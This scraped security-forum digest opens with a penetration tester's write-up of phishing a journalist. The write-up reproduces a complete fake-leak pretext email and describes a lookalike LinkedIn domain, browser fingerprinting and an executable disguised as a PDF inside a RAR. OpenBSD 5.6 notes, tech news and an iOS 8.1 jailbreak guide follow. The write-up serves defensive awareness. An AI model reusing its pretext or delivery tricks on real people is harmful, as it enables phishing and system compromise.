fake, Latin name (we’ll explain why later). From that account, we sent a few e-mails to Sophie asking whether we could meet her. We included a hidden image in an attempt to fingerprint her system when it loaded the image. The e-mail was purposefully vague about the details of any in-person meet because people tend to be curious, and we expected Sophie to reply asking for more details and consequently open additional attack vectors. We never received a response or a proper fingerprint because Gmail prevented it as Google image’s proxy downloaded the images. Fingerprinting: Second Attempt As part of our second fingerprinting attempt, we registered a domain that resembled the Linkedin domain—“linkedhn.com.” We sent an e-mail to Sophie that mimicked the one sent by Linkedin when a user invites you to connect. We sent the e-mail masquerading as a supposed colleague of Sophie’s. If she chose to confirm the connection, the message would lead Sophie to the login page for our cloned Linkedin website. Sophie opened our counterfeit invite but did not log in. We were, however, able to fingerprint the target system using the BeEF framework. We enumerated her plugins, OS version, location, and much more. In short, we identified that Windows 7 with Java 1.7 update 51 and Microsoft Office 2010 were in use. We then quickly lost our browser hook and no further attacks were launched. Although seemingly small, this first victory was important. Blind attacks—when not launched against massive groups of potential targets—are unlikely to succeed against a single individual. Below you see some of the system information we were able to gather. After allowing some time to elapse, we revived our fake gmail account that used a Latin name. We used it to introduce ourselves and lend more credibility to our subsequent pretext. We created a new account called "UK.Leaks.Team@gmail.com" and sent the following, fictitious e-mail to our target three days before Brazil’s presidential election. Sophie, We are part of a Worldwide activist group and write to you again as one of our local collaborators tried to contact you a few weeks ago using the alias Ricardo Almeida to protect his identify, but unfortunately you haven’t replied. We want to talk to you because we have obtained confidential files from the UK government and are currently working with newspapers from different countries. At the time of writing we already have agreements with national newspapers from the USA, Germany, Italy, France, Brazil, Argentina and South Africa. The document in reference must be released on October 3rd, 2014; two days before the Brazilian Election Day. … We would like to invite The [REDACTED] to be a primary channel for public disclosure of this document and attach a partial extract for your initial review. If you agree to publish an article in accordance with our coordinated global release date of October 3rd, we will send the full document and related files for your review. Please be aware we are a not-for-profit group and our identities must remain private to protect individuals involved. Viewing Instructions?? The attached file is compressed and encrypted with a strong password "![REDACTED]Curtis7482" (without quotes), in order to reduce the file size and increase the security of our communication. If you are using Windows you may need to copy the attached .rar file outside Outlook to be able to open it since the file is encrypted, as follows: You will need a tool to extract .rar files, for example Winrar, 7Z, etc. The steps below are based on Winrar. Copy the attached file to your "Documents” folder. On the "Documents” folder, right click on "UK Leaks Proof – [REDACTED].rar", choose "extract here" and insert the password. A new file will be created called "UK Leak #12 - BR Voting System.pdf", which can be double clicked to open. We hope you find the extract enlightening and are waiting for your answer. Sincerely. UK Leaks Team? The contents of this message are confidential and may be privileged. Copying or disclosing is prohibited. Guess what? She opened the e-mail and followed the instructions. Originally she hesitated, but it seems her appetite for a scoop overwhelmed her reluctance. Put yourself in her place. She is a journalist for a big newspaper, and she’s contacted by a supposed anonymous leaker with ground-breaking news about electoral fraud. What would you do? You probably wouldn’t let security best practice get in the way of a potential exclusive! Maybe you’d think twice, but you might also put faith in your antivirus program and have a look at the attachment. Here’s the e-mail displayed on her computer: Her use of the Webmail interface caught our attention. Later, we discovered that she seemed to be using a different computer as the fingerprint in this case differed from the original. We used an old trick to impersonate the binary and make it look like a valid PDF file. Because Gmail prohibits sending a direct executable, usually we hide it inside a .zip file. Gmail also blocked the .zip file and so in the end we were forced to use something less common. We chose to use a .rar file and adapt the pretext to it. We hypothesized that since Sophie was a technology journalist, she might already have Winrar installed. Below is how the fake PDF file appeared to Sophie on her computer once she followed the instructions: It looks like a genuine attachment, right? A clue that reveals something might be amiss is its description as “application” in the “type” column. Many people might ignore it, but it’s worth checking that description to avoid such social engineering hacks. Another feature we added was that every time the fake PDF was opened, it paused for a few seconds and displayed a pop-up message stating “Access was denied.” We hoped this might lead to her double-clicking the file again or trying to open it using another computer. It worked! As a result we got 6 different connections and shells from her laptop. We packed the executable with a private packer that at the time had a very low rate of detection. The payload is a variation of the 3 in 1 described in this blog post. At one point she replied to our e-mail agreeing to the release date and saying she planned to open the file immediately. As you’ll see below, warnings from security software on her system raised her suspicions. But in spite of her reservations: the pressure of the release date, the potential for a scoop that could affect her career in a positive way, and her confidence in her security software led to the compromise of her system. After her original reply, it took her another 25 minutes to execute the file. We think this might have been a symptom of her trepidation. We delayed our response to let the pressure and phony urgency work its magic. Once she sent her second response expressing her concerns that it was a scam, it was too late—she was already compromised. But, had this particular attack failed, her asking us for proof gave us a second chance to try another attack vector had we needed it. We think she may be thinking to herself, "Did I just do something I shouldn't have?!" As we showed you earlier, Sophie was using the Gmail web interface with Chrome. She also had OpenOffice, which is less common. The computer was not running with elevated privileges, but as you know, there are ways to escalate privileges even on a fully patched computer (but that’s a topic for another blog post). Once we established command and control on her system, there isn’t anything we couldn't have done. We did consider one of the most interesting avenues to be piggy-backing onto the corporate VPN connection, stealing credentials, and then exploring the file-shares and other resources used by Sophie and potentially her colleagues. The sky was the limit. What can we take away from this? Organizations should consider the following: Raise awareness and educate employees on the potential perils of social engineering attacks. Review gaps in perimeter anti-malware defenses (particularly e-mail and web gateways). If security gateway technology is already in place, be sure it’s configured to be effective and that it’s tested. Regular patching and updating of systems and software is not just for servers. Patching end-user systems and software should be a structured, on-going activity. Understand that the compromise of a user laptop can lead to pivoted attacks against the internal corporate network, even if the compromised user is working from home. For example, attackers could pivot through any corporate VPN connections that are, or will be, established by that remote user. As a footnote to this post it’s worth mentioning that often we get asked, “what’s the point of social engineering, you’re always going to get in”. To be fair, that is a pretty accurate statement. The value of social engineering engagements comes partly from testing resilience, but more so more from raising employee awareness of what is possible when they are targeted. Posted by SpiderLabs Anterior on 28 October 2014 Sursa: Hacking a Reporter: UK Edition - SpiderLabs Anterior

[h=2]OpenBSD 5.6[/h] Released Nov 1, 2014 Copyright 1997-2014, Theo de Raadt. ISBN 978-0-9881561-4-2 5.6 Song: "Ride of the Valkyries" Order a CDROM from our ordering system. See the information on the FTP page for a list of mirror machines. Go to the pub/OpenBSD/5.6/ directory on one of the mirror sites. Have a look at the 5.6 errata page for a list of bugs and workarounds. See a detailed log of changes between the 5.5 and 5.6 releases. signify(1) pubkeys for this release: base: RWR0EANmo9nqhpPbPUZDIBcRtrVcRwQxZ8UKGWY8Ui4RHi229KFL84wV fw: RWT4e3jpYgSeLYs62aDsUkcvHR7+so5S/Fz/++B859j61rfNVcQTRxMw pkg: RWSPEf7Vpp2j0PTDG+eLs5L700nlqBFzEcSmHuv3ypVUEOYwso+UucXb All applicable copyrights and credits can be found in the applicable file sources found in the files src.tar.gz, sys.tar.gz, xenocara.tar.gz, or in the files fetched via ports.tar.gz. The distribution files used to build packages from the ports.tar.gz file are not included on the CDROM because of lack of space. [h=3]What's New[/h] This is a partial list of new features and systems included in OpenBSD 5.6. For a comprehensive list, see the changelog leading to 5.6. LibreSSL This release forks OpenSSL into LibreSSL, a version of the TLS/crypto stack with goals of modernizing the codebase, improving security, and applying best practice development processes. No support for legacy MacOS, Netware, OS/2, VMS and Windows platforms, as well as antique compilers. Removal of the IBM 4758, Broadcom ubsec, Sureware, Nuron, GOST, GMP, CSwift, CHIL, CAPI, Atalla and AEP engines, either because the hardware is irrelevant, or because they require external non-free libraries to work. No support for FIPS-140 compliance. No EBCDIC support. No support for big-endian i386 and amd64 platforms. Use standard routines from the C library (malloc, strdup, snprintf...) instead of rolling our own, sometimes badly. Remove the old OpenSSL PRNG, and rely upon arc4random_buf from libc for all the entropy needs. Remove the MD2 and SEED algorithms. Remove J-PAKE, PSK and SRP (mis)features. Aggressive cleaning of BN memory when no longer used. No support for Kerberos. No support for SSLv2. No support for the questionable DTLS heartbeat extension. No support for TLS compression. No support for US-Export SSL ciphers. Do not use the current time as a random seed in libssl. Support for ChaCha and Poly1305 algorithm. Support for Brainpool and ANSSI elliptic curves. Support for AES-GCM and ChaCha20-Poly1305 AEAD modes. [*]Improved hardware support, including: SCSI Multipathing support via mpath(4) and associated path drivers on several architectures. New qlw(4) driver for QLogic ISP SCSI HBAs. New qla(4) driver for QLogic ISP2100/2200/2300 Fibre Channel HBAs. New upd(4) sensor driver for USB Power Devices (UPS). New brswphy(4) driver for Broadcom BCM53xx 10/100/1000TX Ethernet PHYs. New uscom(4) driver for simple USB serial adapters. New axen(4) driver for ASIX Electronics AX88179 10/100/Gigabit USB Ethernet devices. The inteldrm(4) and radeondrm(4) drivers have improved suspend/resume support. The userland interface for the agp(4) driver has been removed. The rtsx(4) driver now supports card readers based on the RTS5227 and RTL8402 chipsets. The firmware for the run(4) driver has been updated to version 0.33. The run(4) driver now supports devices based on the RT3900E chipset. The zyd(4) driver, which was broken for some time, has been fixed. The bwi(4) driver now works in systems with more than 1GB of RAM. The re(4) driver now supports devices based on the RTL8168EP/8111EP, RTL8168G/8111G, and RTL8168GU/8111GU chipsets. [*]Generic network stack improvements: divert(4) now supports checksum offload. IPv6 is now turned off on new interfaces by default. Assigning an IPv6 address will enable IPv6 on an interface. Support for RFC4620 IPv6 Node Information Queries has been removed. The kernel no longer supports the SO_DONTROUTE socket option. The getaddrinfo(3) function now supports the AI_ADDRCONFIG flag defined in RFC 3493. Include router alert option (RAO) in IGMP packets, as required by RFC2236. ALTQ has been removed. The hash table for Protocol Control Block (PCB) of TCP and UDP now resize automatically on load. [*]Installer improvements: Remove ftp and tape as install methods. Preserve the disklabel (and next 6 blocks) when installing boot block on 4k-sector disk drives. Change the "Server?" question to "HTTP Server?" to allow unambiguous autoinstall(8) handling. Allow autoinstall(8) to fetch and install sets from multiple locations. Many sample configuration files have moved from /etc to /etc/examples. [*]Routing daemons and other userland network improvements: When used with the -v flag, tcpdump(8) now shows the actual bad checksum within the IP/protocol header itself and what the good checksum should be. ftp(1) now allows its User-Agent to be changed via the -U command-line option. The -r option of ping(8) and traceroute(8) has been removed. ifconfig(8) can now explicitly assign an IPv6 link-local address and turn IPv6 autoconf on or off. ifconfig(8) has been made smarter about parsing WEP keys on the command line. ifconfig(8) scan now shows the encryption type of wireless networks (WEP, WPA, WPA2, 802.1x). MS-CHAPv1 (RFC2433) support has been removed from pppd(8). traceroute6(8) has been merged into traceroute(8). The asr API for asynchronous address resolution and nameserver querying is now public. pflow(4)'s pflowproto 9 has been removed. The userland ppp(8) daemon and its associated PPPoE helper, pppoe(8), have been removed. snmpd(8), snmpctl(8), and relayd(8) now communicate via the AgentX protocol. relayd(8) has a new filtering subsystem, where the new configuration language uses last-matching pf-like rules. The new relayd(8) filter rules now support URL-based relaying. relayd(8) now uses privilege separation for private keys. This acts as an additional mitigation to prevent leakage of the private keys from the processes doing SSL/TLS. New httpd(8) HTTP server with FastCGI and SSL support. [*]OpenSMTPD 5.4.3 (includes changes to 5.4.2): New/changed features: OpenSMTPD replaces Sendmail as the default MTA. Queue process now runs under a different user for better isolation. Merged MDA, MTA and SMTP processes into a single unprivileged process. Killed the MFA process, it is no longer needed. Added support for email addresses lookups in the table_db backend. Added RSA privilege separation support to prevent possible private key leakage. [*]The following significant bugs have been fixed in this release: Minor bug fixes in some corner cases of the routing logic. The enqueuer no longer adds its own User-Agent. Disabled profiling code, allowing all processes to rest rather than waking up every second. Reworked the purge task to avoid disk-hits unless necessary... only once at startup. Fix various header parsing bugs in the local enqueuer. Assorted minor fixes and code cleanups. [*]Security improvements: Changed the heuristics of the stack protector to also protect functions with local array definitions and references to local frame addresses. This matches the -fstack-protector-strong option of upstream GCC. Position-independent executables (PIE) are now used by default on powerpc. Removed Kerberos. Default bcrypt hash type is now $2b$. Remove md5crypt support. Improved easier to use bcrypt API is now available. Increase randomness of random mmap mappings. Added getentropy(2). Added timingsafe_memcmp(3). Removed the MD4 hash algorithm and functions from cksum(1), S/Key, and libc. gets(3) has been removed. Added reallocarray(3), which allows multiple sized objects to be allocated without the cost of clearing memory while avoiding possible integer overflows. Extended fread(3) and fwrite(3) to check for integer overflows. [*]Assorted improvements: locate databases for both base and xenocara, as /usr/lib/locate/src.db and /usr/X11R6/lib/locate/xorg.db. Much faster package updates, due to package contents reordering that precludes re-downloading unchanged files. Fix many programs that failed when accessing disks having sector sizes other than 512 bytes, including badsect(8), df(1), dump(8), dumpfs(8), fsck_ext2fs(8), fsck_ffs(8), fsdb(8), growfs(8), ncheck_ffs(8), quotacheck(8), tunefs(8). Constrain MSDOS timestamps to 1/1/1980 through 12/31/2107. 64-bit time_t values outside that range are stored as 1/1/1980. bs(6) now prints a battleship splash screen. rcp, rsh, rshd, rwho, rwhod, ruptime, asa, bdes, fpr, mkstr, page, spray, xstr, oldrdist, fsplit, uyap, and bluetooth have been removed. rmail(8) and uucpd(8) have been removed from the base system and added to the ports tree. Lynx has been removed from the base system and added to the ports tree. TCP Wrappers have been removed. Fix atexit(3) recursive handlers. Enhance disklabel(8) to recover filesystem mountpoint information when reading saved ascii labels. Properly handle msgbuf_write(3) EOF conditions, including uses in tmux(1), dvmrpd(8), ldapd(8), ldpd(8), ospf6d(8), ospfd(8), relayd(8), ripd(8), smtpd(8), ypldap(8). Constrain fdisk(8) '-l' to disk sizes of 64 blocks or more. Sync fdisk(8) built-in MBR with current /usr/mdec/mbr. Quiet dhclient(8) '-q' even more. Log less redundant dhclient(8) info. New leases, lease renewals, cable state changes more obvious to applications monitoring dhclient(8) files. Preserve chronological order of leases in the dhclient.leases(5) leases files. Use 'lease {}' statements in dhclient.conf(5), allowing interfaces to get an address when no dynamic lease is available. Improve dhclient(8) parsing and printing of classess static routes. Eliminate unnecessary rewrites of resolv.conf(5) by dhclient(8). Added sendsyslog(2): syslog(3) now works even when out of file descriptors or in a chroot. Added errc(3), verrc(3), warnc(3) and vwarnc(3). Faster hibernate/unhibernate performance on amd64 and i386 platforms. Support hibernating to softraid(4) crypto volumes. Improved performance of seekdir(3) to start of current buffer. Added <endian.h> per the revision of the POSIX spec in progress. Apache has been removed. Read support for ext4 filesystems. Reworked mplocks as ticket locks instead of spinlocks on amd64, i386, and sparc64. This provides fairer access to the kernel lock between logical CPUs, especially in multi socket systems. [*]OpenSSH 6.7 Potentially-incompatible changes: sshd(8): The default set of ciphers and MACs has been altered to remove unsafe algorithms. In particular, CBC ciphers and arcfour* are disabled by default. sshd(8): Support for tcpwrappers/libwrap has been removed. OpenSSH 6.5 and 6.6 have a bug that causes ~0.2% of connections using the "curve25519-sha256@libssh.org" KEX exchange method to fail when connecting with something that implements the specification correctly. OpenSSH 6.7 disables this KEX method when speaking to one of the affected versions. [*]New/changed features: Major internal refactoring to begin to make part of OpenSSH usable as a library. So far the wire parsing, key handling and KRL code has been refactored. Please note that we do not consider the API stable yet, nor do we offer the library in separable form. ssh(1), sshd(8): Add support for Unix domain socket forwarding. A remote TCP port may be forwarded to a local Unix domain socket and vice versa or both ends may be a Unix domain socket. ssh(1), ssh-keygen(1): Add support for SSHFP DNS records for Ed25519 key types. sftp(1): Allow resumption of interrupted uploads. ssh(1): When rekeying, skip file/DNS lookups of the hostkey if it is the same as the one sent during initial key exchange. (bz#2154) sshd(8): Allow explicit ::1 and 127.0.0.1 forwarding bind addresses when GatewayPorts=no; allows client to choose address family. (bz#2222) sshd(8): Add a sshd_config(5) PermitUserRC option to control whether ~/.ssh/rc is executed, mirroring the no-user-rc authorized_keys option. (bz#2160) ssh(1): Add a %C escape sequence for LocalCommand and ControlPath that expands to a unique identifer based on a hash of the tuple of (local host, remote user, hostname, port). Helps avoid exceeding miserly pathname limits for Unix domain sockets in multiplexing control paths. (bz#2220) sshd(8): Make the "Too many authentication failures" message include the user, source address, port and protocol in a format similar to the authentication success/failure messages. (bz#2199) Added unit and fuzz tests for refactored code. [*]The following significant bugs have been fixed in this release: sshd(8): Fix remote forwarding with same listen port but different listen address. ssh(1): Fix inverted test that caused PKCS#11 keys that were explicitly listed in ssh_config(5) or on the commandline not to be preferred. ssh-keygen(1): Fix bug in KRL generation: multiple consecutive revoked certificate serial number ranges could be serialised to an invalid format. Readers of a broken KRL caused by this bug will fail closed, so no should-have-been-revoked key will be accepted. ssh(1): Reflect stdio-forward ("ssh -W host:port ...") failures in exit status. Previously we were always returning 0. (bz#2255) ssh(1), ssh-keygen(1): Make Ed25519 keys' title fit properly in the randomart border. (bz#2247) ssh-agent(1): Only cleanup agent socket in the main agent process and not in any subprocesses it may have started (e.g. forked askpass). Fixes agent sockets being zapped when askpass processes fatal(). (bz#2236) ssh-add(1): Make stdout line-buffered; saves partial output getting lost when ssh-add(1) fatal()s part-way through (e.g. when listing keys from an agent that supports key types that ssh-add(1) doesn't). (bz#2234) ssh-keygen(1): When hashing or removing hosts, don't choke on "@revoked" markers and don't remove "@cert-authority" markers. (bz#2241) ssh(1): Don't fatal when hostname canonicalisation fails and a ProxyCommand is in use; continue and allow the ProxyCommand to connect anyway (e.g. to a host with a name outside the DNS behind a bastion). scp(1): When copying local->remote fails during read, don't send uninitialised heap to the remote end. sftp(1): Fix fatal "el_insertstr failed" errors when tab-completing filenames with a single quote char somewhere in the string. (bz#2238) ssh-keyscan(1): Scan for Ed25519 keys by default. ssh(1): When using VerifyHostKeyDNS with a DNSSEC resolver, down-convert any certificate keys to plain keys and attempt SSHFP resolution. Prevents a server from skipping SSHFP lookup and forcing a new-hostkey dialog by offering only certificate keys. sshd(8): Avoid crash at exit via NULL pointer reference. (bz#2225) Fix some strict-alignment errors. [*]mandoc 1.13.0: New implementation of apropos(1), whatis(1), and makewhatis(8) based on SQLite3 databases. Substantial improvements of mandoc(1) error and warning messages. Almost complete implementation of roff(7) numerical expressions. About a dozen minor new features and numerous bug fixes. [*]Ports and packages: Over 8,800 ports. [*]Many pre-built packages for each architecture: [TABLE=width: 95%] [TR] [TD=width: 25%] i386: 8588 sparc64: 7965 alpha: 6278 sh: 2626 [/TD] [TD=width: 25%] amd64: 8588 powerpc: 8049 m88k: 2475 sparc: 3394 [/TD] [TD=width: 25%] arm: 5633 hppa: 6143 vax: 1995 [/TD] [TD=width: 25%] mips64: 4686 mips64el: 6697 [/TD] [/TR] [/TABLE] [*]Some highlights: GNOME 3.12.2 KDE 3.5.10 KDE 4.13.3 Xfce 4.10 MySQL 5.1.73 PostgreSQL 9.3.4 Postfix 2.11.1 OpenLDAP 2.3.43 and 2.4.39 Mozilla Firefox 31.0 Mozilla Thunderbird 31.0 GHC 7.6.3 LibreOffice 4.1.6.2 Emacs 21.4 and 24.3 Vim 7.4.135 PHP 5.3.28, 5.4.30 and 5.5.14 Python 2.7.8, 3.3.5 and 3.4.1 Ruby 1.8.7.374, 1.9.3.545, 2.0.0.481 and 2.1.2 Tcl/Tk 8.5.15 and 8.6.1 JDK 1.6.0.32 and 1.7.0.55 Mono 3.4.0 Chromium 36.0.1985.125 Groff 1.22.2 Go 1.3 GCC 4.6.4, 4.8.3 and 4.9.0 LLVM/Clang 3.5 (20140228) Node.js 0.10.28 [*]As usual, steady improvements in manual pages and other documentation. [*]The system includes the following major components from outside suppliers: Xenocara (based on X.Org 7.7 with xserver 1.15.2 + patches, freetype 2.5.3, fontconfig 2.11.1, Mesa 10.2.3, xterm 309, xkeyboard-config 2.11 and more) Gcc 4.2.1 (+ patches) and 3.3.6 (+ patches) Perl 5.18.2 (+ patches) Nginx 1.6.0 (+ patches) SQLite 3.8.4.3 (+ patches) Sendmail 8.14.8, with libmilter Bind 9.4.2-P2 (+ patches) NSD 4.0.3 Unbound 1.4.22 Sudo 1.7.2p8 Ncurses 5.7 Binutils 2.15 (+ patches) Gdb 6.3 (+ patches) Less 458 (+ patches) Awk Aug 10, 2011 version [h=3]How to install[/h] Following this are the instructions which you would have on a piece of paper if you had purchased a CDROM set instead of doing an alternate form of install. The instructions for doing an FTP (or other style of) install are very similar; the CDROM instructions are left intact so that you can see how much easier it would have been if you had purchased a CDROM instead. Sursa: OpenBSD 5.6

[h=1]Windows 8.1: Black Belt Security[/h] Date: October 31, 2014 from 10:15AM to 11:30AM Day 4 Hall 8.1 Room G WIN-B318 Speakers: Sami Laiho Download [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality MP4 file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality MP4 file. If you have a Windows Phone, iPhone, iPad, or Android device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 66.7 MB Mid Quality MP4 (Windows Phone, HTML5, iPhone) [h=3]File size[/h] 285.9 MB High Quality MP4 (iPad, PC, Xbox) MP4 (iPhone, Android) Learn why and how you should leverage the Windows 8.1 security technologies like BitLocker, AppLocker, UAC, Least Privilege and Remote Desktop Restricted Admin -mode. In this 75 minute bombardment against the Windows OS you will see scary hands-on examples on how to break into an unprotected OS. If you still need to convince your boss to give you budget for implementing more security measures you don't want to miss this! Sami's black belt session was evaluated as the best session in TechEd North America 2014, TechEd Australia 2013 and as the best session by an external speaker in TechEd Europe 2013. Sursa: Windows 8.1: Black Belt Security | TechEd Europe 2014 | Channel 9

1 November 2014 Microsoft OneDrive in NSA PRISM Tweet A sends: 1) Bitlocker keys are uploaded to OneDrive by 'device encryption'. "Unlike a standard BitLocker implementation, device encryption is enabled automatically so that the device is always protected. ... If the device is not domain-joined a Microsoft Account that has been granted administrative privileges on the device is required. When the administrator uses a Microsoft account to sign in, the clear key is removed, a recovery key is uploaded to online Microsoft account and TPM protector is created." What's New in BitLocker in Windows and Windows Server 2) Device encryption is supported by Bitlocker for all SKUs that support connected standby. This would include Windows phones. "BitLocker provides support for device encryption on x86 and x64-based computers with a TPM that supports connected stand-by. Previously this form of encryption was only available on Windows RT devices." What's New in BitLocker in Windows and Windows Server 3) The tech media and feature articles recognise this. "... because the recovery key is automatically stored in SkyDrive for you." Surface, BitLocker, and the future of encryption | ZDNet 4) Here's how to recover your key from Sky/OneDrive. "Your Microsoft account online. This option is only available on non-domain-joined PCs. To get your recovery key, go to ...onedrive.com..." BitLocker recovery keys: Frequently asked questions - Windows Help 5) SkyDrive (now named OneDrive) is onboarded to PRISM. (pg 26/27) http://hbpub.vo.llnwd.net/o16/video/olmk/holt/greenwald/NoPlaceToHide- Documents-Uncompressed.pdf Sursa: Microsoft OneDrive in NSA PRISM

After eight years of work, HTML5 is finalized HTML5 was designed to move the Web from serving static documents to becoming a full-fledged platform for building apps By Joab Jackson After nearly eight years of work, the World Wide Web Consortium (W3C) has finalized the HTML5 standard, bringing the basic Web technology firmly into the era of mobile devices and cloud-driven rich Internet applications. "HTML5 brings the next generation of the Web," said W3C CEO Jeff Jaffe. "It wasn't so long ago that the Web was about browsing static documents. Today's Web is a much richer platform." Although Web and mobile developers have been using parts of the HTML5 specification for several years, the finished specification -- which the W3C calls a recommendation -- ensures developers that the code they develop for the Web will work going forward. "We're now at a stable state that everyone can build to the standard and be certain that it will be implemented in all browsers," Jaffe said. "If we didn't have complete interoperability, we wouldn't have one Web." In 1989, physicist Tim Berners-Lee created the first version of the HTML as a way to format and link together written materials so they could be accessed over the Internet. In the years since, the resulting World Wide Web has come to serve billions of users all manner of content, from movies and music to full-fledged applications. The HTML5 final recommendation, over 1,370 pages in length, addresses this complex environment. HTML5 provides a way to serve multimedia content and application functionality without relying on proprietary plug-ins to the browser. It also addresses a wide range of other uses for the Web, such as delivering scalable vector graphics (SVG) and math annotations (MathML). Today, HTML5 provides a "write-once, run-anywhere" cross-platform alternative to writing applications for multiple mobile platforms, such as Android and Apple iOS devices, Jaffe said. About 42 percent of mobile application developers are using HTML, along with JavaScript and Cascading Style Sheets (CSS) to build their apps, according to a 2014 survey from mobile analysis firm Vision Mobile. The W3C hopes the specification will be a cornerstone for future work in what it calls the Open Web Platform, an even richer set of standards for building cross-platform vendor neutral online applications. Moving froward, the W3C is developing specifications for real-time communications, electronic payments and application development. It is also creating a set of safeguards for privacy and security. Ian Hickson, now employed at Google, served as the principal architect of the HTML5 specification, and engineers at Microsoft, IBM and Apple served as co-chairs for the working group. Over 45,000 emails were exchanged when drafting the document, from representatives of 60 companies. Sursa: After eight years of work, HTML5 is finalized | Computerworld

Exploiting CVE-2014-4113 on Windows 8.1 October 31, 2014 Moritz Jodeit <moritz@jodeit.org> Table of Contents 1 Introduction ..................................................................................................................................... 3 2 Vulnerability Details ........................................................................................................................ 3 3 Exploitation on Windows 8.1 .......................................................................................................... 4 3.1 Crafting the win32k!tagWND structure .................................................................................. 4 3.2 Finding an overwrite target ..................................................................................................... 6 3.3 Combining all steps ................................................................................................................. 8 4 Conclusion ....................................................................................................................................... 9 Download: http://www.jodeit.org/research/Exploiting_CVE-2014-4113_on_Windows_8.1.pdf

Easy Jailbreak 8.1 Untethered Guide – One Click Cydia Bundle Pangu 1.1: All iOS 8 Devices Posted in iPhone 5s, iPhone 6 Plus, Jailbreak 8.1 - 31 October 2014 - 28 comments How to Jailbreak 8.1 Untethered iOS 8 via Pangu 1.1 One-Clic Cydia Bundle on iPhone 6 Plus, 6 iPhone 5S, 4S and iPad Air 2, Mini 3, 4 – Pangu is on fire, they’ve done it again, we now have a simplified jailbreak 8.1 solution. Today, ensuing a plethora of recent developments and releases, the Pangu Team released a near-perfect iteration of their Pangu for iOS 8 utility that’s capable of providing an Untethered jailbreak on 8.1 for all iPhone, iPad and iPod touch models. While the group of Chinese-based hackers previously issued the first iteration of their jailbreak tool for iOS 8.1 last week, said tool was mostly intended for jailbreak tweak developers and advanced users – now, with today’s release, Pangu has pushed out a utility intended for the masses. The new Pangu 1.1 jailbreak iOS 8.1 tool finally comes bundled with Cydia (the graphical user interface, and distribution platform, for third-party iOS tweaks that has effectively monopolized the jailbreak scene). Jailbreaking 8.1 on the iPhone 6 Plus, iPhone 6, iPhone 5s, iPhone 5c, iPhone 4s, the new iPad Air 2 and iPad mini 3, the original iPad Air, the iPad Mini 2 with Retina display, iPad 4, the original iPad mini, iPad 3, iPad 2 and, last but certainly not least, the 5th generation iPod touch on 8.0 through 8.1 has never been easier! Continue reading past the break for complete instructions on how to jailbreak any of the aforementioned iDevices running 8.1 completely Untethered. How To Jailbreak 8.1 Untethered iPhone 6 Plus, 6, 5S, iPad Air 2, Mini 3, 4 And iPod Touch This guide will assist you in not only jailbreaking iOS 8.x, but also installing Cydia in an all-new, one-shot method employing the use of the Pangu Team’s updated Pangu 1.1 utility. As previously stated, the newest iteration of the Pangu jailbreak 8.1 utility supports the following iDevice models running iOS 8 through 8.1: iPhone 6 Plus iPhone 6 iPhone 5s, 5c, 5, iPhone 4S iPad Air 2, 1 iPad Mini 3, 2, 1 iPad 4, 3, as well as the iPad 2 iPod touch 5th generation Jailbreak iOS 8 – 8.1 Requirements: All iPhone, iPod Touch And iPad Models Before proceeding any further with this , ensure that you have, and complete, the following as all are necessary to ensure the success of an untethered jailbreak on Apple’s latest public firmware(s). Any of the above iDevices running iOS 8 through 8.1 that were not updated through the Setting app’s OTA (over-the-air) update option. If you performed an OTA update, follow the below prerequisite instructions. Also, ensure that your device does not have a passcode set or Find my iPhone enabled, both of which can be set back post jailbreak – this is very important. A Windows-based PC – while Mac OS X isn’t officially supported Pangu should update their utility soon. For the time being, either create a Windows partition using Boot Camp Assistant or setup a virtual machine; numerous tutorials can be found online for either option. The Latest version of iTunes, as well as the all-new 1.1 Pangu Windows jailbreak iOS 8.1 utility, both of which can be found, and downloaded, from the download section below. iOS 8.1 Jailbreak OTA And Prerequisite Instructions, Which Are Crucial Also, as alluded to in the second step, if you updated your device through Apple’s OTA update ability or you want to ensure that you don’t encounter issues (and you prefer to err on the side of caution) follow the below steps to guarantee a successful jailbreak. 1. Plug your device into your computer via USB and initiate a complete backup inside iTunes. 2. Restore to a clean build of iOS 8.1 by clicking the option to perform a restore. 3. Jailbreak 8.1 following this guide and, once you’ve jailbroken successfully, restore from the backup that you created when following the first step. Now, without further ado, we can continue with the steps required to jailbreak iOS 8.1 on any iPhone, iPad or iPod touch that’s able to run the latest firmware. How To Jailbreak 8.1 Untethered With Pangu: All iOS 8 Devices – Written And Video Tutorials Step 1. In addition to, and beyond, Pangu for iOS 8, download the latest version of iTunes from our download section, listed below, to ensure that you’ve obtain genuine Pangu and Apple software, respectively. Step 2. Following your download of Pangu for iOS 8 version 1.1, plug your iPhone, iPad or iPod into your PC via Apple’s standard Lightning USB cable, or 30-pin connector cable for the iPhone 4s and older iPad models. Step 3. Enter Airplane mode, a step that is fundamental to the jailbreak, and click the blue button at the bottom of the Pangu utility to continue on to jailbreak 8.1. Step 4. Conditional - if Pangu gets stuck towards the end of the on-screen progress bar, find the ‘Pangu New’ app on your device’s springboard, launch it and verify the developer. Upon a successful load, the Pangu utility will proceed to jailbreak iOS 8.1 without further interruption. Step 5. Leave your iPhone, iPad or iPod touch connected to your computer, don’t interface with it, and, once your device reboots, you’ll be greeted with a welcome sight in what was previously a blank space on your device’s springboard: Cydia. Congratulations, after following, and completing, five simple and easy-to-unsderstand steps, you’ve successfully jailbroken your iPod touch, iPhone or iPad running iOS 8 through 8.1! Also, while you’re well on your way to enjoying the countless benefits of jailbreaking, avoid the installation of incompatible tweaks, and those that have yet to be updated for support on iOS 8.x, as they’re unquestionably harmful. Jailbreak iOS 8.1 Pangu Download Section: Pangu 1.1 1. Pangu 8.1 Jailbreak download for Windows-based PC users. 2. Apple’s latest iteration of iTunes, which is required for Pangu to recognize your device and, in turn, jailbreak. 3. The iOS 8.1 IPSW, which should be used to restore to if you wish to ensure the success of your jailbreak on iOS 8. Finally, as a concluding note, for those of you interested in earning paid iOS 8.1 App Store apps for Free, we advise checking out FreeAppLife inside of Safari on your iDevice, regardless of its jailbreak status. Thanks for both reading and following our detailed UnTethered jailbreak 8.1 and iOS 8 tutorial. Don’t forget to subscribe to our Jailbreak Evasion 8.1 UnTethered news feed, like us on Facebook, follow us on Twitter and add us on Google+ to be expediently notified when 